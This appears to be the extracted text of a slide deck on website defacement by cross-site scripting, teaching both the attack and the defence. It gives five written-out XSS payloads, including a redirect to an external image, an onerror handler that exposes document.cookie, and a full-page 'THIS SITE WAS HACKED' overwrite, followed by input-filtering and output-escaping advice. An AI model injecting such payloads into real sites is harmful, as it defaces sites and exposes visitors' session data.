The Codex of Business Writing Software for Real-World Solutions 2.pptx
Website Defacement Techniques
1.
2. Introduction
• Website defacement is an attack on a website that
changes the visual appearance of the site or a webpage.
Defacing is one of the most common things when the
hacker found the vulnerability in website.
• Defacement is generally meant as a kind of electronic
graffiti, although recently it has become a means to
spread messages by politically motivated "cyber
protesters" or hacktivists.
3. Testing
• Test will be entered and captured each time using OWASPs
ZAP Proxy. Once this is captured we will the replace the Test
with our malicious code in turn bypassing the client-side
preventions the web site has in place.
4. 1
• Redirected to hacked Image out of the App Domain
<script>window.location="http://www.theblacktechreport.com/wp
content/uploads/2011/01/hacked.jpg";</script>
5. 2
• Adds a hacked image to the page
<img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg"
onerror=alert(document.cookie);>
6. 3
• Cover full page with Hacked - in App Domain
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS
HACKED</h1></div>";</script>
7. 4
• Change background to RED - in App Domain
<script>document.body.bgColor="red";</script>
8. 5
• Set the background to Hacked Image- in App Domain
<script>document.body.background="http://www.theblacktechreport.com/wpcontent/uploads/2011/01/hacked.jpg";</script>
9. 1
Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of this characters is
needed by the application, properly escaping is enough. A non comprehensive list of characters likely to be part of an
attack vector is:
•
•
•
•
•
•
•
•
•
•
•
•
<> (triangular parenthesis)
() (parenthesis)
" (quotation mark)
& (ampersand sign)
' (single apostrophe)
+ (plus sign)
% (percent sign)
= (equals sign)
: (colon)
` (forward tick)
; (semicolon)
´ (back tick)
2
Escape all the untrusted output before presenting to the UI. Follow the rules detailed in the next link to ensure proper
escaping for every context and location:
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_ Cheat_Sheet
3
When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).